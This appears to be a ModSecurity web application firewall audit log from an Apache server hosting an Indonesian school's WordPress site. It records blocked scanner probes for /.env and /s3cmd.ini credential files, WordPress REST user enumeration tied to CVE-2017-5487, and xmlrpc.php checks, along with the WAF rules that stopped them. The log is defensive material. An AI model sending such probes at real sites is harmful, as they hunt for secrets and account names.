sr=81, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6d5cd4a-Z-- --9e49ed3d-A-- [17/May/2025:13:01:47 +0700] aCgmS3yxdQCiyU1ENFctiAAAAAM 103.236.140.4 55220 103.236.140.4 8181 --9e49ed3d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 134.199.149.50 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 134.199.149.50 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --9e49ed3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9e49ed3d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747461707274475 676 (- - -) Stopwatch2: 1747461707274475 676; combined=289, p1=252, p2=0, p3=0, p4=0, p5=37, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9e49ed3d-Z-- --5243dc2e-A-- [17/May/2025:13:51:12 +0700] aCgx4Om4kjNN-hEbWjJGWQAAAEk 103.236.140.4 58150 103.236.140.4 8181 --5243dc2e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 51.77.21.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 51.77.21.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5243dc2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5243dc2e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747464672757875 3274 (- - -) Stopwatch2: 1747464672757875 3274; combined=1446, p1=509, p2=905, p3=0, p4=0, p5=32, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5243dc2e-Z-- --c0aba234-A-- [17/May/2025:14:15:01 +0700] aCg3dRKi5m5upc8uMd6mygAAAME 103.236.140.4 58406 103.236.140.4 8181 --c0aba234-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept-Charset: utf-8 --c0aba234-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0aba234-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747466101924862 879 (- - -) Stopwatch2: 1747466101924862 879; combined=381, p1=336, p2=0, p3=0, p4=0, p5=45, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0aba234-Z-- --fec64b51-A-- [17/May/2025:14:27:50 +0700] aCg6dnyxdQCiyU1ENFcu5gAAAAE 103.236.140.4 58446 103.236.140.4 8181 --fec64b51-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 181.205.21.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 181.205.21.50 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --fec64b51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fec64b51-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747466870776785 2911 (- - -) Stopwatch2: 1747466870776785 2911; combined=1273, p1=450, p2=791, p3=0, p4=0, p5=31, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fec64b51-Z-- --12f15929-A-- [17/May/2025:14:46:34 +0700] aCg-2nyxdQCiyU1ENFcu_AAAAA8 103.236.140.4 58538 103.236.140.4 8181 --12f15929-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.113.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.113.161 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --12f15929-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --12f15929-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747467994383872 3287 (- - -) Stopwatch2: 1747467994383872 3287; combined=1450, p1=506, p2=911, p3=0, p4=0, p5=32, sr=95, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12f15929-Z-- --c5762622-A-- [17/May/2025:14:46:39 +0700] aCg-33yxdQCiyU1ENFcu_gAAABQ 103.236.140.4 58542 103.236.140.4 8181 --c5762622-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.113.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.113.161 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c5762622-C-- demo.sayHello --c5762622-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5762622-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747467999854462 4714 (- - -) Stopwatch2: 1747467999854462 4714; combined=3674, p1=430, p2=3045, p3=24, p4=25, p5=88, sr=65, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5762622-Z-- --a732a947-A-- [17/May/2025:14:56:10 +0700] aChBGhKi5m5upc8uMd6mzgAAAMo 103.236.140.4 58584 103.236.140.4 8181 --a732a947-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.174.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.174.200 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a732a947-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a732a947-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747468570074100 2863 (- - -) Stopwatch2: 1747468570074100 2863; combined=1254, p1=437, p2=786, p3=0, p4=0, p5=30, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a732a947-Z-- --31ff914d-A-- [17/May/2025:14:56:14 +0700] aChBHnyxdQCiyU1ENFcvCQAAAA4 103.236.140.4 58588 103.236.140.4 8181 --31ff914d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.174.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.174.200 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --31ff914d-C-- demo.sayHello --31ff914d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --31ff914d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747468574886088 4612 (- - -) Stopwatch2: 1747468574886088 4612; combined=3581, p1=453, p2=2926, p3=24, p4=25, p5=90, sr=84, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31ff914d-Z-- --c225f137-A-- [17/May/2025:14:56:50 +0700] aChBQnyxdQCiyU1ENFcvCgAAAA8 103.236.140.4 58592 103.236.140.4 8181 --c225f137-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.168 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c225f137-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c225f137-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747468610922359 3358 (- - -) Stopwatch2: 1747468610922359 3358; combined=1424, p1=490, p2=902, p3=0, p4=0, p5=31, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c225f137-Z-- --118d8d29-A-- [17/May/2025:14:56:58 +0700] aChBShKi5m5upc8uMd6m0AAAAM0 103.236.140.4 58598 103.236.140.4 8181 --118d8d29-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.168 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --118d8d29-C-- demo.sayHello --118d8d29-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --118d8d29-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747468618146904 4613 (- - -) Stopwatch2: 1747468618146904 4613; combined=3598, p1=454, p2=2912, p3=24, p4=24, p5=105, sr=65, sw=79, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --118d8d29-Z-- --cbecdc00-A-- [17/May/2025:15:03:00 +0700] aChCtHyxdQCiyU1ENFcvEgAAAAk 103.236.140.4 58636 103.236.140.4 8181 --cbecdc00-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.185 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.185 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --cbecdc00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cbecdc00-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747468980938486 2866 (- - -) Stopwatch2: 1747468980938486 2866; combined=1243, p1=425, p2=780, p3=0, p4=0, p5=37, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cbecdc00-Z-- --33ecc119-A-- [17/May/2025:15:03:05 +0700] aChCuRKi5m5upc8uMd6m0wAAANE 103.236.140.4 58640 103.236.140.4 8181 --33ecc119-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.185 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.185 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --33ecc119-C-- demo.sayHello --33ecc119-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --33ecc119-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747468985040031 5954 (- - -) Stopwatch2: 1747468985040031 5954; combined=4362, p1=567, p2=3566, p3=37, p4=36, p5=93, sr=72, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33ecc119-Z-- --e1365118-A-- [17/May/2025:15:11:08 +0700] aChEnOm4kjNN-hEbWjJGjgAAAEM 103.236.140.4 59314 103.236.140.4 8181 --e1365118-B-- GET /s3cmd.ini HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 216.81.248.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 216.81.248.13 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Redmi Note 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --e1365118-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1365118-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747469468300542 2494 (- - -) Stopwatch2: 1747469468300542 2494; combined=898, p1=422, p2=445, p3=0, p4=0, p5=31, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1365118-Z-- --36bb5669-A-- [17/May/2025:16:15:51 +0700] aChTx3yxdQCiyU1ENFcy3wAAABU 103.236.140.4 35166 103.236.140.4 8181 --36bb5669-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 171.232.108.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 171.232.108.54 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --36bb5669-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36bb5669-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747473351346584 2903 (- - -) Stopwatch2: 1747473351346584 2903; combined=1252, p1=421, p2=792, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36bb5669-Z-- --1eba4174-A-- [17/May/2025:17:05:54 +0700] aChfgnyxdQCiyU1ENFc0rAAAAAM 103.236.140.4 41700 103.236.140.4 8181 --1eba4174-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.120.165.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.120.165.162 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1eba4174-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1eba4174-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747476354471772 2218 (- - -) Stopwatch2: 1747476354471772 2218; combined=1214, p1=392, p2=793, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1eba4174-Z-- --6594f11e-A-- [17/May/2025:17:48:17 +0700] aChpcem4kjNN-hEbWjJY2QAAAEU 103.236.140.4 45064 103.236.140.4 8181 --6594f11e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 217.219.35.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 217.219.35.148 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6594f11e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6594f11e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747478897059137 2882 (- - -) Stopwatch2: 1747478897059137 2882; combined=1307, p1=430, p2=844, p3=0, p4=0, p5=33, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6594f11e-Z-- --a90e8b67-A-- [17/May/2025:17:49:48 +0700] aChpzOm4kjNN-hEbWjJZNAAAAFA 103.236.140.4 46512 103.236.140.4 8181 --a90e8b67-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 189.89.186.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 189.89.186.58 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a90e8b67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a90e8b67-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747478988115863 2416 (- - -) Stopwatch2: 1747478988115863 2416; combined=1064, p1=363, p2=677, p3=0, p4=0, p5=24, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a90e8b67-Z-- --f9f92963-A-- [17/May/2025:18:29:35 +0700] aChzHwTOsBn9MSWb6WKP8QAAAIc 103.236.140.4 54262 103.236.140.4 8181 